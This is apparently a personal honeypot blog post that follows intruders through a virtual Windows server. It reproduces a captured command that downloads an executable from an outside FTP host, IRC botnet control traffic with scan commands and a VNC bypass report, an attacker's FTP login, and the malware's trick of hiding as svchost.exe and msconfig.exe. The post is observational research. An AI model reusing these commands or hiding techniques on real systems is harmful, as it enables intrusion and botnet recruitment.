* endellion.me.uk

 

inscene.ath.cx -- svchost.exe and msconfig.exe

verdict: fascinating

Poor server2k3 gets transferred onto VMWare on Fedora Core 6 where he is made to work day and night. It only takes 12 hours before the first successful break-in. Still the VNC authentication flaw is the best, apparently.

I have had to firewall several ports back off because whatever breakins happen through them, they are mindnumbingly boring. Like the buffer overflow on port 445. I can't see the point of something that just sends server down so he needs a restart, or worse, meddles with the system files so he needs to revert to snapshot. No fun.

Anyhow, a customer of the Swiss ISP bluewin.ch finds my server and breaks in at exactly the same time as one from bredband.comhem.se which was slightly confusing but the capture says the swede merely entered cmd c/ echo open 83.250.195.169 21304 get 7.exe, in that ubiquitous auto scan sort of way, whereas the swiss guy is actually controlling the desktop. Fascinating.

trusted

First off he changes the security levels on Internet Explorer to add inscene.110mb.com as a trusted site, and then downloads two files from there, to wit install.exe and serv.exe. He runs then both. This brings up a command prompt and server is told the following:

cmd

Server begins to scan the local network on port 5900 -- a pretty good indication that the program has phoned home somewhere for instructions. The packet trace shows that server connected to an irc botnet thingy on 203.121.177.54:65500, an IP belonging to Central Trading Co. Ltd in Thailand:

NICK L0-10x4
USER farifjo "fo5.net" "lol" :farifjo
:irc.botnet.org NOTICE AUTH :*** Looking up your hostname...
:irc.botnet.org NOTICE AUTH :*** Found your hostname
PING :DA5D1A0B
PONG DA5D1A0B
:irc.botnet.org 001 L0-10x4 :Welcome to the botnet IRC Network L0-10x4!farifjo@87-194-136-23.bethere.co.uk
:irc.botnet.org 002 L0-10x4 :Your host is irc.botnet.org, running version Unreal3.2.6
:irc.botnet.org 003 L0-10x4 :This server was created Fri Dec 22 22:22:59 2006
:irc.botnet.org 004 L0-10x4 irc.botnet.org Unreal3.2.6 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGj
:irc.botnet.org 005 L0-10x4 NAMESX SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS :are supported by this server
:irc.botnet.org 005 L0-10x4 WATCH=128 SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTG NETWORK=botnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=~&@%+ EXCEPTS INVEX :are supported by this server
:irc.botnet.org 005 L0-10x4 CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
:irc.botnet.org 251 L0-10x4 :There are 1 users and 59 invisible on 1 servers
JOIN ##zomgitsdbot## passwordizzle
:irc.botnet.org 254 L0-10x4 8 :channels formed
:irc.botnet.org 255 L0-10x4 :I have 60 clients and 0 servers
:irc.botnet.org 265 L0-10x4 :Current Local Users: 60 Max: 61
:irc.botnet.org 266 L0-10x4 :Current Global Users: 60 Max: 61
:irc.botnet.org 422 L0-10x4 :MOTD File is missing
:L0-10x4 MODE L0-10x4 :+iwx
:L0-10x4!farifjo@botnet-EDFF8497.bethere.co.uk JOIN :##zomgitsdbot##
:irc.botnet.org 332 L0-10x4 ##zomgitsdbot## :.scan 64 seq b 2 0
:irc.botnet.org 333 L0-10x4 ##zomgitsdbot## Fr0zen_and_R4v3r1n 1174562880
:irc.botnet.org 353 L0-10x4 @ ##zomgitsdbot## :L0-10x4 L1-f7ka L3-j[}r W3-17y5 W3-85bu W3-]fae L3-vkt1 W3-nk_f W3-`5}b L3-p3_u L2-{j3d L3-atvh W3-o2ud W3-rjy4 W2-j}gt W2-zkfe L3-14kg L3-kw]g L3-^9f1 L3-qi-7 L3-}1t| L2-qyn` L2-vrfm L3-8q9x L3-asfv L3-9adl L1-37eg W1-2l2- W3-6zhv W1-}7[c L1-8a`0 W3-`eew L3-l9v3 L3-zt^c L3-7jg8 L3-{mpa L2-l10- W3-09o7 L3-o1ck W1-k[y^ W1-9``e L1-|zet W3-8-3k Fr0zen_and_R4v3r1n W0-^lf{ W1-_3g2 W0-95vz W3--ue3 W3-53{f W3-1_}5
:irc.botnet.org 353 L0-10x4 @ ##zomgitsdbot## :L3-vcn_ W1-04}j W3-qxal W1-3m-2 W3-]koj W1-7]z3 W0-859[ W3-[i6{
:irc.botnet.org 366 L0-10x4 ##zomgitsdbot## :End of /NAMES list.
JOIN ##zomgitsdbot## passwordizzle
PRIVMSG ##zomgitsdbot## :Scanning: 192.168.0.0, 64 threads. FTP: 30830.
PRIVMSG ##VNC## :VNC3.8 SERVER2K3: 192.168.0.121 - [AuthBypass]

svchost.exe

Any Windows installation has a number of svchost processes running. When viewed in taskmanager, they all look the same. Virus writers want their programs to go unobserved, I imagine, so they tend to have two approaches to the naming of their executables. One is to name it with a slight typo, but run it from the system32 directory. The other is this one: name it the same, but run it from somewhere else. All the legitimate svchosts (well it's only one program really, invoked a number of times with different options) run from \windows\system32. This one runs from \windows\system32\drivers\disdn\. This is an existing directory, but as far as I know it's usually empty. Of course task manager doesn't tell you the path to the process.

FTP server

Before long there is a login to the ftp server. I am not totally sure what this is all about though? RETR is the same as GET? It was only just put there by the same IP address? I'm sure Fr0zen kn0ws wh4t h3 15 d01ng.

220 ProFTPD 1.2.10 Server ready.
USER Fr0zen
331 .[34mUsEr nAmE OkAy, NeEd pAsSwOrD!!!
PASS 14111980
230- .. ............ ....... ....... .. ..........
230- ... ...... ... .... .....................
230- ... ....... ... ... ... ................
230- .... ........ ... ... .. ................
230- ............ ... ... ... ........ .......
230- ........... .... .... ............. ......
230- ......................................... ..........
230-...----..[ Str0 by Fr0zen and R4v3r1n ]..----..------.
230-| Server Uptime: 0 Days, 0 Hours, 0 Mins |
230-| System Uptime: 0 Days, 1 Hours, 1 Mins |
230-| Free Space C:\: 6.13 GB D:\: 0 Bytes |
230-| Free Space E:\: N/A F:\: N/A |
230-| Free Space G:\: N/A H:\: N/A |
230-| Free Space I.\: N/A J:\: N/A |
230-| Free Space K:\: N/A L:\: N/A |
230-| Free Space M:\: N/A N:\: N/A |
230-| Free Space O:\: N/A P:\: N/A |
230-| Free Space Q:\: N/A R:\: N/A |
230-| Free Space S:\: N/A T:\: N/A |
230-| Free Space U:\: N/A V:\: N/A |
230-| Free Space W:\: N/A X:\: N/A |
230-| Free Space Y:\: N/A Z:\: N/A |
230-| Uptime Upload: 0 Bytes / 0 KB/s |
230-| Uptime Dnload: 0 Bytes / 0 KB/s |
230-| Alltime Upload: 0 Bytes / 0 KB/s |
230-| Alltime Dnload: 0 Bytes / 0 KB/s |
230-| Users Logged In: 1 current / 1 since start |
230-| Net Usage Up: 0.0 KB/s Dn: 0.0 KB/s |
230-|----------------------------------------------------|
230-| User: FR0ZEN IP: 83.77.205.159 |
230-| Alltime Upload: 32.46 MB Download: 1.52 GB |
230-| Last Login: 07:45, 19.03.2007 Logins: 21 |
230-|----------------------------------------------------|
230-:[This Site is powered by JASTAT. View "SITE HELP"!!]:
230 .[31mPaSsWoRd sEeMs tO Be oKaY,.[30mhaVe pHuN
SYST
215 ProFTPD: 1337-.8 (c) by Fr0zen
FEAT
211-Extension supported
CLNT
MDTM
MDTM YYYYMMDDHHMMSS[+-TZ];filename
SIZE
SITE PSWD;EXEC;SET;INDEX;ZONE;CHMOD;MSG
REST STREAM
XCRC filename;start;end
MODE Z
211 End
CLNT FlashFXP 3.2.0.1080
200 Noted.
PWD
257 "/c:" .[34mIs cUrReNt dIrEcToRy.
TYPE A
200 Type set to A.
MODE Z
200 MODE Z ok.
PASV
227 .[34mEnTeRiNg ShIt pAsSiVe mOdE (192,168,0,121,4,64)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
CWD /c:/windows/system32/drivers/disdn
250-Clients:[1]-Up:[0.0 KB/s]-Dn:[0.0 KB/s]-Space:[6.13 GB]
250 .[34mDiReCtOrY ChAnGeD To /c:/WINDOWS/system32/drivers/disdn
PWD
257 "/c:/WINDOWS/system32/drivers/disdn" .[34mIs cUrReNt dIrEcToRy.
PASV
227 .[34mEnTeRiNg ShIt pAsSiVe mOdE (192,168,0,121,5,221)
LIST -al
150 Opening ASCII mode data connection for /bin/ls.
226 Transfer complete.
TYPE I
200 Type set to I.
SIZE svchost.exe
213 800256
PASV
227 .[34mEnTeRiNg ShIt pAsSiVe mOdE (192,168,0,121,6,20)
RETR svchost.exe
150 Opening BINARY mode data connection for svchost.exe (800256 Bytes).
226-.-----------------------[Download Stats]--------------------------.
226-| Filename | Size | Speed |
226-|---------------------------------------+-------------+-----------|
226-| svchost.exe | 781 KB | 97 KB/s |
226-:---------------------------------------+-------------+-----------:
226 .[34mYeAh, TrAnSfEr cOmPlEtE Du hAsT Es gEsChAfFt!

Msconfig.exe is located in C:\System Volume Information\msconfig which is a fine directory for anything as the default Windows configuration won't even let you see (it's ususally set to hidden) or look in it ("access denied") and even if you could see the size of it, I imagine most people's SVI's are pretty big anyway what with all the System Restores there (yes, the ones that put your virus straight back onto your computer...). Of course, if you were always logged in as a user rather than an administrator, none of this would have happened in the first place. How likely is that though on Windows.

Next time I look, we're on a different IRC channel. An awful lot of scrolling is going off. Something to do with warez. Here is a sample "conversation" since it's way too long to include here.

What I do like is the little warning that comes up at the start:

:Global!services@inscene.ath.cx NOTICE [iNS-UK]-6GB :[.Logon News. - Jan 05 2007] .Warnung! Dies ist ein privates Netzwerk! Wenn du keinen Account (und damit keine Erlaubnis dich hierher zu verbinden) besitzt, musst du sofort die Verbindung trennen! Danke..

Hmm... I suppose I have an account, seeing as that they've given me one?

Well, as Poor Server has now been made to join a warez bot army, I am waiting for the warez, and it doesn't take long at all. The bluewin.ch customer uploads a movie to my System Volume Information. Unfortunately it's german, as most of the stuff seems to be. I'm regretting going with the VMWare default option of an 8GB drive now, who knows what I'm missing out on.

I delete the movie. The next day the switzerman uploads a folder called 'utils' containing, surprise surprise, utilities, mainly related to picture and movie conversion. It's better than before, but I notice that the files are incomplete. Why would Frozen be doing that? I mean, it's as good as garbage like this. I'm hoping that this oversight will soon be mended, but there's no sign of it.

Fr0zen does have a little look round my drives though, and discovers a cd in the tray he obviously likes the look of. He begins to download the files off it. Hey -- we can't be having that now!

Another thing to notice at this point is the names of the computers that have been forcefully recruited into this bot army. They appear based on IP nationality and size of Hard drive free space. So what's with the ones that have 'linux' in the name? I dread to think that our good friends the linux fanatics are also becoming the victims of this evil. I'm going with the explanation that some of these people might be there voluntarily sharing warez? I really would like to think that linux was way too secure an operating system to be thus implemented. Root? Who is that?